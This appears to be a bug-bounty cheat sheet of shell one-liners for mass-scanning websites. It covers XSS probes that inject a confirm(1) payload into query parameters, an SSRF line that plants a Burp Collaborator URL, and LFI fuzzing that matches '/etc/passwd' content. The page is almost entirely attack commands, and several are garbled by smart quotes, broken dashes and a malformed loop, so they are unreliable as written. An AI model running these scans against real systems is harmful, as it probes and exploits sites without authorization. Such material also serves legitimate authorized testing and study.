# one line script

{% embed url="<https://github.com/dwisiswant0/awesome-oneliner-bugbounty>" %}

XSS

gospider -S targets\_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt

cat bofeb.txt | grep "=" | egrep -iv ". (jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|s vg|txt|js)" | qsreplace '">confirm(1)' | tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)" && echo "$host \033\[0;31mVulnerable\n" || echo "$host \033\[0;32mNot Vulnerable\n"; done

waybackurls testphp.vulnweb.com | tee testphp1.txt | grep "=" | egrep -iv ". (jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|s vg|txt|js)" | qsreplace '">confirm(1)' | tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)" && echo "$host \033\[0;31mVulnerable\n" || echo "$host \033\[0;32mNot Vulnerable\n"; done

echo <https://google.com> | hakrawler -subs >> google.txt |cat google.txt | grep "=" | egrep -iv ". (jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|s vg|txt|js)" | qsreplace '">confirm(1)' | tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)" && echo "$host \033\[0;31mVulnerable\n" || echo "$host \033\[0;32mNot Vulnerable\n"; done

cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”>confirm(1)’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “confirm(1)” && echo “$host 33\[0;31mVulnerablen”;done

***

SSRF

findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep “=” | qsreplace <http://YOUR.burpcollaborator.net>

***

LFI

findomain -t example.com -q | waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w \~/wordlist/LFI.txt ; done
